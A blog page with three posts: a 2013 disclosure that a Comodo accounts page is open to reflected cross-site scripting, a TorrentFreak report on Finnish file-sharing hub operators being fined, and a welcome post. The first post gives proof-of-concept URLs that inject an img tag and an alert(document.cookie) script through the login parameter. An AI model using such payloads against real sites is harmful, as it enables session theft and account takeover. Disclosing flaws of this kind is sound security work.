This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
44.220.184.63.US.SSL

Comodo.com still vulnerable to XSS

Vulnerable page: https://accounts.comodo.com/

PoC
https://accounts.comodo.com/account/forget_password?user[login]="><img src=http://te-home.net/images/logo.png>
https://accounts.comodo.com/account/forget_password?user[login]="><script>alert(document.cookie)</script>

You can either include any XSS code in login input box, or request any XSS code directly using GET method and user[login] parameter. Same goes for email input box, or user[email].

Image tag
Script tag


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2013-11-25 21:56 0 comments 0 likes

File-Sharing Operators Hit With Big Fines, Jail Sentences

A man and woman who operated a 50TB capacity file-sharing hub have been found guilty of copyright infringement offenses. Despite arguing that their 2,600 member system was set up merely for discussion, the pair now face paying damages to the IFPI of more than $1 million and suspended jail sentences totalling 7 months.

Image
Following a music industry investigation, in June 2007 police in Finland carried out house raids against the operators of a Direct Connect hub.

The hub, which in very basic terms operated a little like a BitTorrent tracker, directing traffic between other members of the network, was known as Sarah’s Secret Chamber. It had around 1,600 users and most of them were sharing large amounts of copyrighted material.

In normal circumstances, most members of this type of network will bring some of their own content to the party, pooling resources so that the hub has a library of material. Very often bringing large amount of content is a requirement for membership. Sarah’s Secret Chamber had a fairly large capacity – around 50 terabytes.

For the purposes of a trial the IFPI converted 50TB to “750,000 illegal albums” and to compensate for this ill-gotten booty, copyright holders demanded some $2.7 million in compensation.

Yesterday, in a district court in Tammisaari west of the capital Helsinki, two of the site’s admins were sentenced. Rejecting their claims that the hub was set up for the purposes of discussion, the court ruled that the pair would have been fully aware of what was happening with their users and that copyright violations were taking place.

The 35 year-old woman and a 21 year-old man received suspended jail sentences of four and three months respectively. The court ordered the pair to pay compensation to rightsholders of 800,000 euros ($1.08 million), the bulk of it going to the IFPI.

“It is a shame to see how a private organization has the power to chase after people and can not even show any significant loss of income or any other harm to anyone,” said Finnish Pirate Party chairman Pasi Palmulehto in a statement. “Even real crimes do not normally result in such large sums of compensation.”

The fine even exceeds that handed down to seven operators of the Finnish BitTorrent site Finreactor. Last year they were ordered to pay a total of 680,000 euros in damages to copyright holders.

Source: TorrentFreak
Posted by Andy Maxwell on 2011-01-21 01:00 0 comments 1 like

Welcome

Please welcome to our new website. Feel free to take a look around and express yourself in the forum or using the contact form, if you find something awful or missing. Happy surfing.
Posted by RoLex on 2010-01-01 01:00 0 comments 4 likes